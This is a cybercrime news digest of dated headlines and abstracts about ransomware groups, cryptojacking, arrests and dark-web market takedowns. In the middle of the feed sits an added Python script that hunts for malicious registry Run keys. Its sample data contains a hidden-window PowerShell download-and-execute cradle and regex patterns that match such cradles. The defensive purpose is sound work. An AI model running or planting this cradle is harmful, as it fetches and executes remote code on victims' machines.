Abstract Cybersecurity researchers have unmasked the identity of one of the individuals who is believed to be associated with the e-crime actor known as XE Group. According to Menlo Security, which pieced together the information from different online sources, "Nguyen Huu Tai, who also goes by the names Joe Nguyen and Thanh Nguyen, has the strongest likelihood of being involved with the XE Group." XE Group (aka XeThanh), previously documented by Malwarebytes and Volexity, has a history of carrying out cyber criminal activities since at least 2013. It's suspected to be a threat actor of Vietnamese origin. Some of the entities targeted by the threat actor span government agencies, construction organizations, and healthcare sectors. It's known to compromise internet-exposed servers with known exploits and monetize the intrusions by installing password theft or credit card skimming code for online services. "As far back as 2014, the threat actor was seen crea

The Hacker News


May 31, 2023

Cybercriminals Targeting Apache NiFi Instances for Cryptocurrency Mining Full Text

Abstract A financially motivated threat actor is actively scouring the internet for unprotected Apache NiFi instances to covertly install a cryptocurrency miner and facilitate lateral movement. The findings come from the SANS Internet Storm Center (ISC), which detected a spike in HTTP requests for "/nifi" on May 19, 2023. "Persistence is achieved via timed processors or entries to cron," said Dr. Johannes Ullrich, dean of research for SANS Technology Institute. "The attack script is not saved to the system. The attack scripts are kept in memory only." A honeypot setup allowed the ISC to determine that the initial foothold is weaponized to drop a shell script that removes the "/var/log/syslog" file, disables the firewall, and terminates competing crypto-mining tools, before downloading and launching the Kinsing malware from a remote server. It's worth pointing out that Kinsing has a track record of leveraging publicly disclosed vulnerabilities in publicly accessible web applicati

The Hacker News


May 30, 2023

CAPTCHA-Breaking Services with Human Solvers Helping Cybercriminals Defeat Security Full Text

Abstract Cybersecurity researchers are warning about CAPTCHA-breaking services that are being offered for sale to bypass systems designed to distinguish legitimate users from bot traffic. "Because cybercriminals are keen on breaking CAPTCHAs accurately, several services that are primarily geared toward this market demand have been created," Trend Micro said in a report published last week. "These CAPTCHA-solving services don't use [optical character recognition] techniques or advanced machine learning methods; instead, they break CAPTCHAs by farming out CAPTCHA-breaking tasks to actual human solvers." CAPTCHA, short for Completely Automated Public Turing test to tell Computers and Humans Apart, is a tool for differentiating real human users from automated users with the goal of combating spam and restricting fake account creation. While CAPTCHA mechanisms can be a disruptive user experience, they are seen as an effective means to counter attacks from bot-ori

The Hacker News


May 25, 2023

Buhti Ransomware Gang Switches Tactics, Utilizes Leaked LockBit and Babuk Code Full Text

Abstract The threat actors behind the nascent Buhti ransomware have eschewed their custom payload in favor of leaked LockBit and Babuk ransomware families to strike Windows and Linux systems. "While the group doesn't develop its own ransomware, it does utilize what appears to be one custom-developed tool, an information stealer designed to search for and archive specified file types," Symantec said in a report shared with The Hacker News. The cybersecurity firm is tracking the cybercrime group under the name Blacktail. Buhti was first highlighted by Palo Alto Networks Unit 42 in February 2023, describing it as a Golang ransomware targeting the Linux platform. Later that same month, Bitdefender revealed the use of a Windows variant that was deployed against Zoho ManageEngine products that were vulnerable to critical remote code execution flaws (CVE-2022-47966). The operators have since been observed swiftly exploiting other severe bugs impacting IBM's Aspera Fasp

The Hacker News


May 22, 2023

Guerrilla Campaign: Lemon Group’s Business of Pre-infected Devices Full Text

Abstract The Lemon Group gained control over millions of smartphones globally through the preinstallation of a malware called Guerrilla, reported Trend Micro. The campaign has been active since 2018. Lemon Group conducts business for marketing and advertising companies and utilizes big data. This highl ...

Cyware


May 22, 2023

Indonesian Cybercriminals Exploit AWS for Profitable Crypto Mining Operations Full Text

Abstract A financially motivated threat actor of Indonesian origin has been observed leveraging Amazon Web Services (AWS) Elastic Compute Cloud (EC2) instances to carry out illicit crypto mining operations. Cloud security company Permiso's P0 Labs, which first detected the group in November 2021, has assigned it the moniker GUI-vil (pronounced Goo-ee-vil). "The group displays a preference for Graphical User Interface (GUI) tools, specifically S3 Browser (version 9.5.5) for their initial operations," the company said in a report shared with The Hacker News. "Upon gaining AWS Console access, they conduct their operations directly through the web browser." Attack chains mounted by GUI-vil entail obtaining initial access by weaponizing AWS keys in publicly exposed source code repositories on GitHub or scanning for GitLab instances that are vulnerable to remote code execution flaws (e.g., CVE-2021-22205). A successful ingress is followed by privilege escalation and

The Hacker News


May 20, 2023

Researchers tie FIN7 cybercrime family to Clop ransomware Full Text

Abstract Long-running cybercrime cartel FIN7, which has made use of ransomware variants developed by groups including REvil and Maze, has added another strain to its arsenal. This time, it's the Cl0p ransomware.

Cyware


May 20, 2023

Cybercrime gang FIN7 returned and was spotted delivering Clop ransomware Full Text

Abstract Cybercriminal gang FIN7 returned with a new wave of attacks aimed at deploying the Clop ransomware on victims' networks. Researchers at Microsoft Security Intelligence team published a series of tweets to warn of a new wave of attacks aimed at distributing...

Security Affairs


May 20, 2023

Notorious Cyber Gang FIN7 Returns With Cl0p Ransomware in New Wave of Attacks Full Text

Abstract The notorious cybercrime group known as FIN7 has been observed deploying Cl0p (aka Clop) ransomware, marking the threat actor's first ransomware campaign since late 2021. Microsoft, which detected the activity in April 2023, is tracking the financially motivated actor under its new taxonomy Sangria Tempest. "In these recent attacks, Sangria Tempest uses the PowerShell script POWERTRASH to load the Lizar post-exploitation tool and get a foothold into a target network," the company's threat intelligence team said. "They then use OpenSSH and Impacket to move laterally and deploy Clop ransomware." FIN7 (aka Carbanak, ELBRUS, and ITG14) has been linked to other ransomware families such as Black Basta, DarkSide, REvil, and LockBit, with the threat actor acting as a precursor for Maze and Ryuk ransomware attacks. Active since at least 2012, the group has a track record of targeting a broad spectrum of organizations spanning software, consulting, f

The Hacker News


May 19, 2023

Lemon Group gang pre-infected 9 million Android devices for fraudulent activities Full Text

Abstract The Lemon Group cybercrime ring has reportedly pre-installed malware known as Guerilla on almost 9 million Android devices. A cybercrime group tracked as Lemon Group has reportedly pre-installed malware known as Guerilla on almost 9 million...

Security Affairs


May 18, 2023

This Cybercrime Syndicate Pre-Infected Over 8.9 Million Android Phones Worldwide Full Text

Abstract A cybercrime enterprise known as Lemon Group is leveraging millions of pre-infected Android smartphones worldwide to carry out their malicious operations, posing significant supply chain risks. "The infection turns these devices into mobile proxies, tools for stealing and selling SMS messages, social media and online messaging accounts and monetization via advertisements and click fraud," cybersecurity firm Trend Micro said. The activity encompasses no fewer than 8.9 million compromised Android devices, particularly budget phones, with a majority of the infections discovered in the U.S., Mexico, Indonesia, Thailand, Russia, South Africa, India, Angola, the Philippines, and Argentina. The findings were presented by researchers Fyodor Yarochkin, Zhengyu Dong, Vladimir Kropotov, and Paul Pajares at the Black Hat Asia conference held in Singapore last week. Describing it as a continuously evolving problem, the cybersecurity firm said the threat actors are branching o

The Hacker News


May 18, 2023

8220 Gang Exploiting Oracle WebLogic Flaw to Hijack Servers and Mine Cryptocurrency Full Text

Abstract The notorious cryptojacking group tracked as 8220 Gang has been spotted weaponizing a six-year-old security flaw in Oracle WebLogic servers to ensnare vulnerable instances into a botnet and distribute cryptocurrency mining malware. The flaw in question is CVE-2017-3506 (CVSS score: 7.4), which, when successfully exploited, could allow an unauthenticated attacker to execute arbitrary commands remotely. "This allows attackers to gain unauthorized access to sensitive data or compromise the entire system," Trend Micro researcher Sunil Bharti said in a report published this week. 8220 Gang, first documented by Cisco Talos in late 2018, is so named for its original use of port 8220 for command-and-control (C2) network communications. "8220 Gang identifies targets via scanning for misconfigured or vulnerable hosts on the public internet," SentinelOne noted last year. "8220 Gang is known to make use of SSH brute force attacks post-infection for the purp

The Hacker News


May 18, 2023

Royal Ransomware Group Builds Its Own Malware Loader Full Text

Abstract The Royal ransomware group, which spun off from Conti in early 2022, is refining its downloader using tactics and techniques that appear to draw directly from other post-Conti groups, says Yelisey Bohuslavskiy, chief research officer at Red Sense.

Cyware


May 17, 2023

Monitoring the dark web to identify threats to energy sector organizations Full Text

Abstract Searchlight Cyber researchers warn of threat actors that are offering on the dark web access to energy sector organizations. Dark web intelligence firm Searchlight Cyber published a report that analyzes how threat actors in the dark web prepare their...

Security Affairs


May 15, 2023

New Ransomware Gang RA Group Hits U.S. and South Korean Organizations Full Text

Abstract A new ransomware group known as RA Group has become the latest threat actor to leverage the leaked Babuk ransomware source code to spawn its own locker variant. The cybercriminal gang, which is said to have been operating since at least April 22, 2023, is rapidly expanding its operations, according to cybersecurity firm Cisco Talos. "To date, the group has compromised three organizations in the U.S. and one in South Korea across several business verticals, including manufacturing, wealth management, insurance providers and pharmaceuticals," security researcher Chetan Raghuprasad said in a report shared with The Hacker News. RA Group is no different from other ransomware gangs in that it launches double extortion attacks and runs a data leak site to apply additional pressure on victims into paying ransoms. The Windows-based binary employs intermittent encryption to speed up the process and evade detection, not to mention delete volume shadow copies and contents of t

The Hacker News


May 15, 2023

New RA Group ransomware gang is the latest group using leaked Babuk source code Full Text

Abstract A previously unknown ransomware group known as RA Group is targeting companies in the U.S. and South Korea with leaked Babuk source code. Cisco Talos researchers recently discovered a new ransomware operation called RA Group that has been active since...

Security Affairs


May 12, 2023

Bl00dy Ransomware Gang actively targets the education sector exploiting PaperCut RCE Full Text

Abstract U.S. CISA and FBI warned of attacks conducted by the Bl00dy Ransomware Gang against the education sector in the country. The FBI and CISA issued a joint advisory warning that the Bl00dy Ransomware group is actively targeting the education sector...

Security Affairs


May 12, 2023

Israeli Threat Group Uses Fake Company Acquisitions in CEO Fraud Schemes Full Text

Abstract A group of cybercriminals based in Israel has launched more than 350 business email compromise (BEC) campaigns over the past two years, targeting large multinational companies from around the world.

Cyware


May 12, 2023

The Black Basta ransomware gang hit multinational company ABB Full Text

Abstract Swiss electrification and automation technology giant ABB suffered a Black Basta ransomware attack that impacted its business operations. Swiss multinational company ABB, a leading electrification and automation technology provider, is the latest victim...

Security Affairs


May 11, 2023

Spanish Police Takes Down Massive Cybercrime Ring, 40 Arrested Full Text

Abstract The National Police of Spain said it arrested 40 individuals for their alleged involvement in an organized crime gang called Trinitarians. Among those apprehended include two hackers who carried out bank scams through phishing and smishing techniques and 15 other members of the crime syndicate, who have all been charged with a number of offenses such as bank fraud, forging documents, identity theft, and money laundering. In all, the nefarious scheme is believed to have defrauded more than 300,000 victims, resulting in losses of over €700,000. "The criminal organization used hacking tools and business logistics to carry out computer scams," officials said. To pull off the attacks, the cybercriminals sent bogus links via SMS that, when clicked, redirected users to a phishing panel masquerading as legitimate financial institutions to steal their credentials and abuse the access to request for loans and link the cards to cryptocurrency wallets under their control. These

The Hacker News


May 09, 2023

U.S. Authorities Seize 13 Domains Offering Criminal DDoS-for-Hire Services Full Text

Abstract U.S. authorities have announced the seizure of 13 internet domains that offered DDoS-for-hire services to other criminal actors. The takedown is part of an ongoing international initiative dubbed Operation PowerOFF that's aimed at dismantling criminal DDoS-for-hire infrastructures worldwide. The development comes almost five months after a "sweep" in December 2022 dismantled 48 similar services for abetting paying users to launch distributed denial-of-service (DDoS) attacks against targets of interest. This includes school districts, universities, financial institutions, and government websites, according to the U.S. Department of Justice (DoJ). Ten of the 13 illicit domains seized are "reincarnations" of booter or stresser services that were previously shuttered towards the end of last year. "In recent years, booter services have continued to proliferate, as they offer a low barrier to entry for users looking to engage in cybercriminal activity,

The Hacker News


May 8, 2023

Money Message gang leaked private code signing keys from MSI data breach Full Text

Abstract The ransomware gang behind the attack on Taiwanese PC maker MSI leaked the company's private code signing keys on their darkweb leak site. In early April, the ransomware gang Money Message announced to have hacked the Taiwanese multinational IT corporation...

Security Affairs


May 6, 2023

FBI seized other domains used by the shadow eBook library Z-Library Full Text

Abstract The FBI has once again disrupted the illegal eBook library Z-Library, seizing several domains used by the service. The Federal Bureau of Investigation (FBI) seized multiple domains used by the illegal shadow eBook library Z-Library. Z-Library...

Security Affairs


May 04, 2023

Ransomware gang hijacks university alert system to issue threats Full Text

Abstract The Avos ransomware gang hijacked Bluefield University's emergency broadcast system, "RamAlert," to send students and staff SMS texts and email alerts that their data was stolen and would soon be released.

BleepingComputer


May 3, 2023

Authorities dismantled the card-checking platform Try2Check Full Text

Abstract Authorities dismantled Try2Check, a card-checking platform that generated tens of millions of dollars in revenue. The U.S. DoJ charged Russian citizen Denis Gennadievich Kulkov with running the card-checking service. The platform...

Security Affairs


May 03, 2023

Operation SpecTor: $53.4 Million Seized, 288 Vendors Arrested in Dark Web Drug Bust Full Text

Abstract An international law enforcement operation has resulted in the arrest of 288 vendors who are believed to be involved in drug trafficking on the dark web, adding to a long list of criminal enterprises that have been shuttered in recent years. The effort, codenamed Operation SpecTor, also saw the authorities confiscating more than $53.4 million in cash and virtual currencies, 850 kg of drugs, and 117 firearms. The largest number of arrests were made in the U.S. (153), followed by the U.K. (55), Germany (52), the Netherlands (10), Austria (9), France (5), Switzerland (2), Poland (1), and Brazil (1). "This represents the most funds seized and the highest number of arrests in any coordinated international action," U.S. Attorney General Merrick B. Garland said. "The drug traffickers are confident that, by operating anonymously on the dark web, they can operate outside the bounds of the law. They are wrong." The arrests stem from evidence gathered after the tak

The Hacker News


May 2, 2023

FBI and Ukrainian police seized 9 crypto exchanges used by cybercriminals Full Text

Abstract A joint operation conducted by the FBI and Ukrainian police seized 9 crypto exchanges used by cybercriminal groups for money laundering. The Cyber Police Department together with the Main Investigative Department of the National Police, the Office...

Security Affairs


May 2, 2023

Ransomware Gang Claims Data Theft From Edison Learning Full Text

Abstract The Royal ransomware is claiming to have infiltrated public school management and virtual learning provider Edison Learning, posting on its dark web data leak site on Wednesday, April 26, that it had stolen 20GB of the company’s data.

Cyware


May 2, 2023

SpecTor operation: 288 individuals arrested in the seizure of marketplace Monopoly Market Full Text

Abstract International law enforcement operation SpecTor resulted in the seizure of an online marketplace and the arrest of nearly 300 people. In an international law enforcement operation coordinated by Europol, codenamed 'SpecTor', the police seized the illegal...

Security Affairs


May 1, 2023

Cybercriminals use proxies to legitimize fraudulent requests Full Text

Abstract Bot attacks were previously seen as a relatively inconsequential type of online fraud, and that mentality has persisted even as threat actors have gained the ability to cause significant damage to revenue and brand reputation, according to HUMAN.

Cyware


April 28, 2023

Ukraine cyber police arrested a man for selling data of 300M people Full Text

Abstract The Ukrainian cyber police arrested a Ukrainian man for selling the data of over 300 million people from different countries. The Ukrainian cyber police have arrested a man (36) from the city of Netishyn for selling the personal data and sensitive information...

Security Affairs


April 24, 2023

8220 Gang of Cryptojackers Exploit Log4Shell to Mint Coins Full Text

Abstract Researchers found 8220 Gang exploiting the Log4Shell vulnerability to install CoinMiner in VMware Horizon servers of Korean energy-related companies. The gang uses a PowerShell script to download ScrubCrypt and establish persistence by making edits to the registry entries. System administrators are ...

Cyware
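
The persistence step in the abstract above, a PowerShell download cradle written into a registry Run key, is the kind of autorun an administrator can hunt for offline. The following is an added example, not code from the Cyware item or from any vendor report on 8220 Gang: it parses a constructed .reg export of the HKCU Run key (the value names, the 203.0.113.10 address and the script URL are made up for the example) and flags values that combine several download-cradle indicators. It generalizes beyond this one campaign to any PowerShell launcher planted in Run/RunOnce.

```python
import re

# Constructed sample (.reg export format): one benign autorun and one PowerShell
# download cradle of the kind used for persistence. Nothing here is a real IOC.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"WinUpdate"="powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/u.ps1')\""
'''

# Key suffixes that auto-start programs at logon (hypothetical minimal list).
AUTORUN_KEYS = (
    r"\Software\Microsoft\Windows\CurrentVersion\Run",
    r"\Software\Microsoft\Windows\CurrentVersion\RunOnce",
)

# Each indicator on its own is common in admin scripts; several together are not.
CRADLE_PATTERNS = [
    (r"\bpowershell(?:\.exe)?\b", "powershell launcher"),
    (r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", "encoded command"),
    (r"\bIEX\b|Invoke-Expression", "Invoke-Expression"),
    (r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b", "download cradle"),
    (r"-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"https?://", "URL"),
]

# "Name"=<data>; names may contain escaped quotes/backslashes.
VALUE_LINE = re.compile(r'^"(?P<name>(?:[^"\\]|\\.)*)"=(?P<raw>.*)$')


def _unescape(s):
    """Undo .reg escaping: \\\" -> \" and \\\\ -> \\ in one pass."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg_export(text):
    """Yield (key_path, value_name, value_data) for each named value in a .reg export.
    Only REG_SZ ("...") data is decoded; dword:/hex: payloads are returned raw."""
    key = None
    for line in text.lstrip("\ufeff").splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = VALUE_LINE.match(line)
        if not m or key is None:
            continue
        raw = m.group("raw")
        data = _unescape(raw[1:-1]) if raw.startswith('"') and raw.endswith('"') else raw
        yield key, _unescape(m.group("name")), data


def find_suspicious_autoruns(reg_text, min_hits=2):
    """Return autorun values matching at least min_hits cradle indicators."""
    findings = []
    for key, name, data in parse_reg_export(reg_text):
        if not any(key.lower().endswith(k.lower()) for k in AUTORUN_KEYS):
            continue
        hits = [label for pat, label in CRADLE_PATTERNS if re.search(pat, data, re.IGNORECASE)]
        if len(hits) >= min_hits:
            findings.append({"key": key, "name": name, "command": data, "indicators": hits})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_autoruns(SAMPLE_REG_EXPORT):
        print(f["key"], f["name"], f["indicators"], sep="\n  ")
```

Feed it `reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run run.reg` output (or the HKLM equivalent) collected from a suspect host; the two-indicator threshold keeps plain `powershell.exe script.ps1` entries out of the results while still catching a one-liner that downloads and evaluates remote code.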


April 24, 2023

Russian cybercrime group likely behind ongoing exploitation of PaperCut flaws Full Text

Abstract Print management software provider PaperCut confirmed ongoing active exploitation of the CVE-2023-27350 vulnerability. On April 19th, print management software provider PaperCut confirmed that it is aware of the active exploitation of the CVE-2023-27350...

Security Affairs


April 20, 2023

Lazarus Group Adds Linux Malware to Arsenal in Operation Dream Job Full Text

Abstract The notorious North Korea-aligned state-sponsored actor known as the Lazarus Group has been attributed to a new campaign aimed at Linux users. The attacks are part of a persistent and long-running activity tracked under the name Operation Dream Job, ESET said in a new report published today. The findings are crucial, not least because it marks the first publicly documented example of the adversary using Linux malware as part of this social engineering scheme. Operation Dream Job, also known as DeathNote or NukeSped, refers to multiple attack waves wherein the group leverages fraudulent job offers as a lure to trick unsuspecting targets into downloading malware. It also exhibits overlaps with two other Lazarus clusters known as Operation In(ter)ception and Operation North Star. The attack chain discovered by ESET is no different in that it delivers a fake HSBC job offer as a decoy within a ZIP archive file that's then used to launch a Linux backdoor named SimplexTea

The Hacker News


April 19, 2023

Russian national sentenced to time served for committing money laundering for the Ryuk ransomware operation Full Text

Abstract Russian national Denis Mihaqlovic Dubnikov has been sentenced to time served for committing money laundering for the Ryuk ransomware operation. Russian national Denis Dubnikov (30) has been sentenced to time served for committing money laundering...

Security Affairs


April 18, 2023

Experts temporarily disrupted the RedLine Stealer operations Full Text

Abstract Security experts from ESET have temporarily disrupted the operations of the RedLine Stealer with the help of GitHub. ESET researchers announced that they have temporarily disrupted the operations of the RedLine Stealer with the help of GitHub. The two companies...

Security Affairs


April 18, 2023

The intricate relationships between the FIN7 group and members of the Conti ransomware gang Full Text

Abstract A new malware, dubbed Domino, developed by the FIN7 cybercrime group has been used by the now-defunct Conti ransomware gang. IBM Security X-Force researchers recently discovered a new malware family, called Domino, which was created by developers...

Security Affairs


April 17, 2023

FIN7 and Ex-Conti Cybercrime Gangs Join Forces in Domino Malware Attacks Full Text

Abstract A new strain of malware developed by threat actors likely affiliated with the FIN7 cybercrime group has been put to use by the members of the now-defunct Conti ransomware gang, indicating collaboration between the two crews. The malware, dubbed Domino, is primarily designed to facilitate follow-on exploitation on compromised systems, including delivering a lesser-known information stealer that has been advertised for sale on the dark web since December 2021. "Former members of the TrickBot/Conti syndicate [...] have been using Domino since at least late February 2023 to deliver either the Project Nemesis information stealer or more capable backdoors such as Cobalt Strike," IBM Security X-Force security researcher Charlotte Hammond said in a report published last week. FIN7, also called Carbanak and ITG14, is a prolific Russian-speaking cybercriminal syndicate that's known to employ an array of custom malware to deploy additional malware and broaden its monet

The Hacker News


April 17, 2023

Vice Society gang is using a custom PowerShell tool for data exfiltration Full Text

Abstract Vice Society ransomware operators have been spotted using a PowerShell tool to exfiltrate data from compromised networks. The Palo Alto Unit 42 team observed the Vice Society ransomware gang exfiltrating data from a victim network using a custom-built Microsoft...

Security Affairs


April 14, 2023

RTM Locker, a new RaaS, gains notoriety in the threat landscape Full Text

Abstract Cybersecurity firm Trellix analyzed the activity of an emerging cybercriminal group called 'Read The Manual' RTM Locker. Researchers from cybersecurity firm Trellix have detailed the tactics, techniques, and procedures of an emerging cybercriminal...

Security Affairs


April 13, 2023

RTM Locker: Emerging Cybercrime Group Targeting Businesses with Ransomware Full Text

Abstract Cybersecurity researchers have detailed the tactics of a "rising" cybercriminal gang called "Read The Manual" (RTM) Locker that functions as a private ransomware-as-a-service (RaaS) provider and carries out opportunistic attacks to generate illicit profit. "The 'Read The Manual' Locker gang uses affiliates to ransom victims, all of whom are forced to abide by the gang's strict rules," cybersecurity firm Trellix said in a report shared with The Hacker News. "The business-like set up of the group, where affiliates are required to remain active or notify the gang of their leave, shows the organizational maturity of the group, as has also been observed in other groups, such as Conti." RTM, first documented by ESET in February 2017, started off in 2015 as a banking malware targeting businesses in Russia via drive-by downloads, spam, and phishing emails. Attack chains mounted by the group have since evolved to deploy a ransomwa

The Hacker News


April 12, 2023

Following the Lazarus group by tracking DeathNote campaign Full Text

Abstract This threat cluster linked to the North Korean threat actor Lazarus is also known as Operation DreamJob or NukeSped. It's dubbed DeathNote after its malware payloads named Dn.dll or Dn64.dll.

Cyware


April 12, 2023

Cybercrime group exploits Windows zero-day in ransomware attacks Full Text

Abstract Microsoft has addressed a zero-day in the Windows Common Log File System (CLFS) actively exploited in ransomware attacks. Microsoft has addressed a zero-day vulnerability, tracked as CVE-2023-28252, in the Windows Common Log File System (CLFS), which...

Security Affairs


April 12, 2023

Criminals Pose as Chinese Authorities to Target US-based Chinese Community Full Text

Abstract Criminals exploit widely publicized efforts by the People’s Republic of China government to harass and facilitate the repatriation of individuals living in the United States to build plausibility for their fraud.

Cyware


April 11, 2023

Cybercriminals Turn to Android Loaders on Dark Web to Evade Google Play Security Full Text

Abstract Malicious loader programs capable of trojanizing Android applications are being traded on the criminal underground for up to $20,000 as a way to evade Google Play Store defenses. "The most popular application categories to hide malware and unwanted software include cryptocurrency trackers, financial apps, QR-code scanners, and even dating apps," Kaspersky said in a new report based on messages posted on online forums between 2019 and 2023. Dropper apps are the primary means for threat actors looking to sneak malware via the Google Play Store. Such apps often masquerade as seemingly innocuous apps, with malicious updates introduced once the review process has been cleared and the applications have amassed a significant user base. This is achieved by using a loader program that's responsible for injecting malware into a clean app, which is then made available for download from the app marketplace. Users who install the tampered app are prompted to grant it intrusive permiss

The Hacker News


April 10, 2023

New Darknet Market Styx Offers a Variety of Frauds and Services Full Text

Abstract A new dark web marketplace identified as Styx is gaining popularity among cybercriminals for providing access to a wide range of illegal services such as DDoS attacks, banking trojans, stolen IDs, and 2FA/MFA bypass solutions. It uses Telegram channels where various automated bots interact wit ...

Cyware


April 9, 2023

Estonian National charged with helping Russia acquire U.S. hacking tools and electronics Full Text

Abstract Andrey Shevlyakov, an Estonian national, was charged in the US with conspiracy and other charges related to acquiring U.S.-made electronics on behalf of the Russian government and military. The Estonian man is accused of having helped the Russian...

Security Affairs


April 7, 2023

Microsoft aims at stopping cybercriminals from using cracked copies of Cobalt Strike Full Text

Abstract Microsoft announced it has taken legal action to disrupt the illegal use of copies of the post-exploitation tool Cobalt Strike by cybercriminals. Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named...

Security Affairs


April 06, 2023

FBI Cracks Down on Genesis Market: 119 Arrested in Cybercrime Crackdown Full Text

Abstract A coordinated international law enforcement operation has dismantled Genesis Market, an illegal online marketplace that specialized in the sale of stolen credentials associated with email, bank accounts, and social media platforms. Coinciding with the infrastructure seizure, the major crackdown, which involved authorities from 17 countries, culminated in 119 arrests and 208 property searches in 13 nations. However, the .onion mirror of the market appears to be still up and running. The "unprecedented" law enforcement exercise has been codenamed Operation Cookie Monster. Genesis Market, since its inception in March 2018, evolved into a major hub for criminal activities, offering access to data stolen from over 1.5 million compromised computers across the world totaling more than 80 million credentials. A majority of infections associated with Genesis Market related malware have been detected in the U.S., Mexico, Germany, Turkey, Sweden, Italy, France, Spain, Po

The Hacker News


April 6, 2023

FBI Says it Obtained Details on 59,000 Users of Hacking Site Genesis Market Full Text

Abstract A US official says the server copies include information about approximately 59,000 individual user accounts, such as usernames, passwords, email accounts, and secure messenger accounts, in addition to a history of user activity.

Cyware


April 5, 2023

Law enforcement seized the Genesis Market cybercrime marketplace Full Text

Abstract Law enforcement seized the Genesis Market black marketplace, a platform focused on the sale of stolen credentials, as part of Operation Cookie Monster. The FBI seized the Genesis Market, a black marketplace for stolen credentials that was launched...

Security Affairs


April 5, 2023

STYX Marketplace emerged in Dark Web focused on Financial Fraud Full Text

Abstract The STYX marketplace was launched at the beginning of 2023. This discovery illustrates the post-pandemic menace of cyber-enabled financial crime and the threat it poses to financial institutions and their customers.

Cyware


April 4, 2023

ALPHV/BlackCat ransomware affiliate targets Veritas Backup solution bugs Full Text

Abstract An ALPHV/BlackCat ransomware affiliate was spotted exploiting vulnerabilities in the Veritas Backup solution. An affiliate of the ALPHV/BlackCat ransomware gang, tracked as UNC4466, was observed exploiting three vulnerabilities in the Veritas Backup...

Security Affairs


April 1, 2023

Operation Henhouse: Hundreds of arrests and millions in assets seized in month tackling fraud Full Text

Abstract The NCA’s National Economic Crime Centre has led a successful operation working closely with the City of London Police and other policing partners against suspected fraudsters across the UK.

Cyware


March 31, 2023

Cyber Police of Ukraine arrested members of a gang that defrauded EU citizens of $4.33M Full Text

Abstract The Cyber Police of Ukraine, with law enforcement officials from Czechia, has arrested several members of a gang responsible for a $4.33 million scam. The Cyber Police of Ukraine, with the support of law enforcement officials from the Czech Republic,...

Security Affairs


March 29, 2023

DarkBit puts data from Israel’s Technion university on sale Full Text

Abstract The ransomware attack hit Technion on February 12, forcing the university to block all communication networks. DarkBit originally demanded 80 bitcoins as ransom from the university.

Cyware


March 28, 2023

Europol warns of criminal use of ChatGPT Full Text

Abstract Europol warns that cybercriminal organizations can take advantage of systems based on artificial intelligence like ChatGPT. EU police body Europol warned about the potential abuse of systems based on artificial intelligence, such as the popular chatbot...

Security Affairs


March 28, 2023

Europol details ChatGPT’s potential for criminal abuse Full Text

Abstract ChatGPT’s ability to draft highly realistic text makes it a useful tool for phishing purposes. In addition to generating human-like language, ChatGPT is capable of producing code in a number of different programming languages.

Cyware


March 27, 2023

The FBI’s BreachForums bust is causing ‘chaos in the cybercrime underground’ Full Text

Abstract On March 16, 2022, about a month after the FBI took down a popular online forum for buying and selling stolen data known as RaidForums, another criminal marketplace quickly sprung up to take its place.

Cyware


March 25, 2023

U.K. National Crime Agency Sets Up Fake DDoS-For-Hire Sites to Catch Cybercriminals Full Text

Abstract In what's a case of setting a thief to catch a thief, the U.K. National Crime Agency (NCA) revealed that it has created a network of fake DDoS-for-hire websites to infiltrate the online criminal underground. "All of the NCA-run sites, which have so far been accessed by around several thousand people, have been created to look like they offer the tools and services that enable cyber criminals to execute these attacks," the law enforcement agency said. "However, after users register, rather than being given access to cyber crime tools, their data is collated by investigators." The effort is part of an ongoing international joint effort called Operation PowerOFF in collaboration with authorities from the U.S., the Netherlands, Germany, Poland, and Europol aimed at dismantling criminal DDoS-for-hire infrastructures worldwide. DDoS-for-hire (aka "Booter" or "Stresser") services rent out access to a network of infected devices to other crim

The Hacker News


March 25, 2023

NCA infiltrates the cybercriminal underground with fake DDoS-for-hire sites Full Text

Abstract The U.K. National Crime Agency (NCA) revealed that it has set up a number of fake DDoS-for-hire sites to infiltrate the online criminal underground. The UK National Crime Agency announced it has infiltrated the online criminal marketplace by setting...

Security Affairs


March 22, 2023

BreachForums current Admin Baphomet shuts down BreachForums Full Text

Abstract Baphomet, the current administrator of BreachForums, announced that the popular hacking forum has been officially taken down. U.S. law enforcement arrested last week a US man who goes online with the moniker "Pompompurin"; the US citizen is accused...

Security Affairs


March 22, 2023

BreachForums Administrator Baphomet Shuts Down Infamous Hacking Forum Full Text

Abstract In a sudden turn of events, Baphomet, the current administrator of BreachForums, said in an update on March 21, 2023, that the hacking forum has been officially taken down but emphasized that "it's not the end." "You are allowed to hate me, and disagree with my decision but I promise what is to come will be better for us all," Baphomet noted in a message posted on the BreachForums Telegram channel. The shutdown is suspected to have been prompted by suspicions that law enforcement may have obtained access to the site's configurations, source code, and information about the forum's users. The development follows the arrest of its administrator Conor Brian Fitzpatrick (aka "pompompurin"), who has been charged with a single count of conspiracy to commit access device fraud. Over the past few months, BreachForums filled the void left by RaidForums last year, becoming a lucrative destination to purchase and sell stolen databases from variou

The Hacker News


March 21, 2023

Crooks stole more than $1.5M worth of Bitcoin from General Bytes ATMs Full Text

Abstract Cryptocurrency ATM maker General Bytes suffered a security breach over the weekend, the hackers stole $1.5M worth of cryptocurrency. Cryptocurrency ATM manufacturers General Bytes suffered a security incident that resulted in the theft of $1.5M worth...

Security Affairs


March 20, 2023

Killnet Aggressively Targets Healthcare Organizations Full Text

Abstract KillNet, a cybercriminal collective with ties to Russia, was spotted targeting Microsoft Azure-hosted healthcare apps for more than three months. The highest number of these attacks were launched in February, targeting hospitals, pharma, life science, healthcare insurance, and health services in mo ...

Cyware


March 18, 2023

Feds arrested Pompompurin, the alleged owner of BreachForums Full Text

Abstract U.S. law enforcement arrested this week a US citizen suspected to be Pompompurin, the notorious owner of the BreachForums cybercrime forum. U.S. law enforcement arrested this week a US man who goes online with the moniker "Pompompurin"; the US citizen...

